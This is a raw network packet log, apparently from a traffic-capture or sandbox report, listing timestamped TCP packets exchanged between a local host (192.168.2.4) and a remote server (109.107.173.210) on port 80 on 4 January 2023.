Jan 4, 2023 16:47:25.140037060 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140073061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140100956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140108109 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140108109 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140130997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140158892 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140170097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140170097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140170097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140187025 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140216112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140217066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140217066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140244961 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140269995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140271902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140269995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140300989 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140327930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140326977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140326977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140351057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140356064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140383959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140383959 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140408993 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140410900 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140440941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140441895 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140465975 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140469074 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140496016 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140500069 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140528917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140548944 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140557051 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140583992 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140611887 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140620947 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140620947 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140642881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140669107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140681028 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140681982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140697956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140737057 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140738010 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140738010 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140763044 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140783072 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140783072 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140789032 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140815973 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140834093 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140835047 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140841007 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140867949 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140888929 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140888929 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140892982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140918970 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140938997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140938997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140944004 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140971899 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.140991926 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140991926 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.140994072 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141041040 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141055107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141055107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141068935 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141096115 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141118050 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141118050 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141123056 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141153097 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141170025 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141170025 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141179085 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141206980 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141226053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141226053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141233921 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141263962 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141280890 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141280890 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141294956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141323090 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141341925 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141341925 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141350985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141380072 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141398907 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141398907 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141407967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141437054 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141460896 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141463995 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141460896 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141491890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141511917 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141511917 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141520977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141550064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141568899 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141568899 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141577959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141608000 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141629934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141629934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141647100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141671896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141680002 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141696930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141700983 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141721964 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141725063 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141748905 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141772032 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141773939 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141772032 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141802073 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141824961 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141824961 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141829014 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141859055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141875029 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141875982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141886950 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141915083 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141932964 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141932964 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141942978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141971111 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.141990900 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141990900 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.141998053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.142028093 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.142045021 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.142045021 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.142055035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.142083883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.142101049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.142101049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.142112017 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.142138958 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.142155886 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.142167091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.142188072 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.142188072 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.142194033 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.142221928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.142241001 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.142241001 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.142251015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.142280102 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.142302036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.142302036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.142306089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.142330885 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.142357111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.142357111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.145086050 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.355834007 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.391123056 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.391192913 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.391242027 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.391268969 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.391288042 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.391323090 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.391323090 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.391338110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.391386032 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.391423941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.391439915 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.391439915 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.391473055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.391484976 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.391484976 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.391519070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.391566038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.391603947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.391607046 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.391642094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.391686916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.393424034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.393474102 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.393520117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.393546104 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.393568039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.393620968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.393642902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.393644094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.393644094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.393666983 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.393706083 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.393706083 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.393754005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.393763065 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.393800020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.393831015 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.393831015 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.393848896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.393868923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.393896103 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.393944979 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.393944979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.393974066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.393996000 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.394048929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.394062042 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.394097090 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.394118071 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.394143105 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.394161940 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.394192934 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.394210100 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.394242048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.394256115 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.394289970 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.394304991 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.394339085 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.394349098 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.394387007 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.394397020 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.394433022 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.394448996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.394480944 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.394495964 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.394551992 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.395482063 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.395541906 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.395591021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.395627022 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.395652056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.395672083 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.395694971 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.395710945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.395720005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.395728111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.395766973 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.395812988 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.395827055 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.395859957 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.395874977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.395905972 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.395929098 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.395945072 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.395967960 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.395993948 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.396007061 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.396040916 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.396056890 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.396090031 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.396099091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.396138906 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.396147966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.396188021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.396202087 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.396235943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.396250963 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.396275997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.396291971 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.396322012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.396363974 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.396368980 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.396389008 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.396416903 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.396430969 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.396455050 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.396486044 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.396502972 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.396505117 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.396568060 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.417738914 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.417812109 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.417860985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.417884111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.417908907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.417924881 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.417958021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418009043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418016911 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.418016911 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.418060064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418107033 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.418107033 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.418112993 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418162107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418209076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418221951 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.418258905 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418307066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418353081 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418374062 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.418374062 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.418374062 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.418400049 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418447971 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418450117 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.418450117 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.418494940 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418541908 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418557882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.418590069 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418601990 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.418637991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418648958 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.418685913 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418710947 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.418771982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418819904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.418844938 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.418876886 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.420489073 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.420541048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.420587063 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.420620918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.420634031 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.420639992 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.420681000 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.420725107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.420732975 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.420772076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.420773029 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.420773029 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.420819998 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.420869112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.420886993 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.420917034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.420928001 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.420964956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421011925 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421014071 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421014071 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421062946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421078920 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421109915 CET	80	49695	109.107.173.210	192.168.2.4
